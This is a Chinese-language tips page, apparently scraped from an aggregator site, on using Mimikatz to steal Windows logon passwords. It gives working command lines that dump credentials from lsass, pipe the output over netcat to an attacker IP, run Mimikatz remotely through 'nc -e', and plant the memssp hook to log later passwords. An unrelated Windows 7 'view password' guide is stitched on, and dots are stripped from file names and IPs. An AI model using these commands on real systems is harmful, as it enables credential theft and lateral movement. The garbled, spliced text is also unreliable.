1记录 Mimikatz输出:
C:>mimikatzexe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2将输出导入到本地文件:
C:>mimikatzexe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> logtxt
3将输出传输到远程机器:
Attacker执行:
E:>nc -lvp 4444
Victim执行:
C:>mimikatzexe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | ncexe -vv 192168521 4444
192168521 为Attacker IP
4通过nc远程执行Mimikatz:
Victim执行:
C:>nc -lvp 443
Attacker执行:
E:>ncexe -vv 19216852128 443 -e mimikatzexe
19216852128 为Victim IP
若管理员有每过几天就改密码的习惯,但是 mimikatz 抓取到的密码都是老密码
用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下
可以使用以下方法尝试解决
privilege ::debug
misc::memssp
记录的结果在c:\windows\system32\mimilsalog
每次验证都会记录 如 锁屏 等 重启失效
出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。
也可以直接logoff,但是这样会很明显。
文件
mimikatz exe 、sekurlsadll、PsExec exe (3389)
本机终端
绝对路径[mimikatz]( >
运行mimikatz
键入命令
第一条:privilege::debug
//提升权限
第二条:sekurlsa::logonpasswords
//抓取密码
等待密码结果返回即可
工具:win7系统电脑一台
步骤:
1、打开win7系统电脑,点击开始点击运行。输入“netplwiz”确定。
2、勾选“要使用本机,用户必须输入用户名和密码”,窗口下是本机账户名。
3、点击上方的“高级”,点击管理密码。
4、由于没有设置密码,因此这里没有,如果电脑有设置密码,即可查看到电脑密码。
以上就是关于Mimikatz 使用小技巧全部的内容,包括:Mimikatz 使用小技巧、怎样查看winxp的开机密码,不是破解。、win7如何查看电脑密码只要查看不要删除等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)